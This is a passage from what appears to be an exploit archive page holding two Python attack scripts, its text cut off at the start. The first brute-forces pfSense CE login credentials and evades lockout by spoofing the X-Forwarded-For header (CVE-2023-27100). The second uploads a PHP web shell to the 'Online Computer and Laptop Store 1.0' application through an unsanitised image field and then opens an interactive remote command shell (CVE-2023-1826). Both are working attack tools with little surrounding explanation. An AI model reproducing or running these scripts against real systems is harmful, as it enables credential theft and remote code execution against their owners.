help="pfSense WebServer (Example: http://127.0.0.1/)")<br />parser.add_argument("-u", "--usersList", help="Username Dictionary")<br />parser.add_argument("-p", "--passwdList", help="Password Dictionary")<br />args = parser.parse_args()<br /><br />if len(sys.argv) < 2:<br /> print(f"Exploit Usage: ./CVE-2023-27100.py -h [help] -l [url] -u [user.txt] -p [pass.txt]")<br /> sys.exit(1)<br /><br /># Variable<br />url = args.url<br />usersList = args.usersList<br />passwdList = args.passwdList<br /><br /># Suppress only the single warning from urllib3 needed.<br />if url.upper().startswith("HTTPS://"):<br /> requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)<br /><br />print('pfsenseCE <= 2.6.0 Anti-brute force protection bypass')<br /><br /><br />def login(userlogin, userpasswd):<br /> session = requests.session()<br /> r = session.get(url, verify=False)<br /><br /> # Getting CSRF token value<br /> csrftoken = re.search(r'input type=\'hidden\' name=\'__csrf_magic\' value="(.*?)"', r.text)<br /> csrftoken = csrftoken.group(1)<br /><br /> # Specifying Headers Value<br /> headerscontent = {<br /> 'User-Agent': 'Mozilla/5.0',<br /> 'Referer': f"{url}",<br /> 'X-Forwarded-For': '42.42.42.42'<br /> }<br /><br /> # POST REQ data<br /> postreqcontent = {<br /> '__csrf_magic': f"{csrftoken}",<br /> 'usernamefld': f"{userlogin}",<br /> 'passwordfld': f"{userpasswd}",<br /> 'login': 'Sign+In'<br /> }<br /><br /> # Sending POST REQ<br /> r = session.post(url, data=postreqcontent, headers=headerscontent, allow_redirects=False, verify=False)<br /><br /> # Conditional loops<br /> if r.status_code != 200:<br /> print(f'[*] - Found Valid Credential !!')<br /> print(f"[*] - Use this Credential -> {userlogin}:{userpasswd}")<br /> sys.exit(0)<br /><br /><br /># Reading User.txt & Pass.txt files<br />userfile = open(usersList).readlines()<br />passfile = open(passwdList).readlines()<br /><br />for user in userfile:<br /> user = user.strip()<br /> for passwd in passfile:<br /> passwd = passwd.strip()<br /> login(user, passwd)<br /> <br /><br /></code></pre>
<pre><code>#!/usr/bin/env python3<br /><br /># Exploit Title: Online Computer and Laptop Store 1.0 - Remote Code Execution (RCE)<br /># Date: 09/04/2023<br /># Exploit Author: Matisse Beckandt (Backendt)<br /># Vendor Homepage: https://www.sourcecodester.com/php/16397/online-computer-and-laptop-store-using-php-and-mysql-source-code-free-download.html<br /># Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-ocls.zip<br /># Version: 1.0<br /># Tested on: Debian 11.6<br /># CVE : CVE-2023-1826<br /><br /># Exploit Description : The application does not sanitize the 'img' parameter when sending data to '/classes/SystemSettings.php?f=update_settings'. An attacker can exploit this issue by uploading a PHP file and accessing it, leading to Remote Code Execution.<br />import requests<br />from argparse import ArgumentParser<br />from uuid import uuid4<br />from datetime import datetime, timezone<br /><br />def interactiveShell(fileUrl: str):<br /> print("Entering pseudo-shell. Type 'exit' to quit")<br /> while True:<br /> command = input("\n$ ")<br /> if command == "exit":<br /> break<br /><br /> response = requests.get(f"{fileUrl}?cmd={command}")<br /> print(response.text)<br /><br />def uploadFile(url: str, filename: str, content):<br /> endpoint = f"{url}/classes/SystemSettings.php?f=update_settings"<br /> file = {"img": (filename, content)}<br /><br /> response = requests.post(endpoint, files=file)<br /> return response<br /><br />def getUploadedFileUrl(url: str, filename: str):<br /> timeNow = datetime.now(timezone.utc).replace(second=0) # UTC time, rounded to minutes<br /> epoch = int(timeNow.timestamp()) # Time in milliseconds<br /> possibleFilename = f"{epoch}_{filename}"<br /> fileUrl = f"{url}/uploads/{possibleFilename}"<br /> response = requests.get(fileUrl)<br /> if response.status_code == 200:<br /> return fileUrl<br /><br />def exploit(url: str):<br /> filename = str(uuid4()) + ".php"<br /> content = "<?php system($_GET['cmd'])?>"<br /> response = uploadFile(url, filename, content)<br /><br /> if response.status_code != 200:<br /> print(f"[File Upload] Got status code {response.status_code}. Expected 200.")<br /><br /> uploadedUrl = getUploadedFileUrl(url, filename)<br /> if uploadedUrl == None:<br /> print("Error. Could not find the uploaded file.")<br /> exit(1)<br /> print(f"Uploaded file is at {uploadedUrl}")<br /><br /> try:<br /> interactiveShell(uploadedUrl)<br /> except KeyboardInterrupt:<br /> pass<br /> print("\nQuitting.")<br /><br />def getWebsiteURL(url: str):<br /> if not url.startswith("http"):<br /> url = "http://" + url<br /> if url.endswith("/"):<br /> url = url[:-1]<br /> return url<br /><br />def main():<br /> parser = ArgumentParser(description="Exploit for CVE-2023-1826")<br /> parser.add_argument("url", type=str, help="The url to the application's installation. Example: http://mysite:8080/php-ocls/")<br /> args = parser.parse_args()<br /><br /> url = getWebsiteURL(args.url)<br /> exploit(url)<br /><br />if __name__ == "__main__":<br /> main()<br /> <br /><br /></code></pre>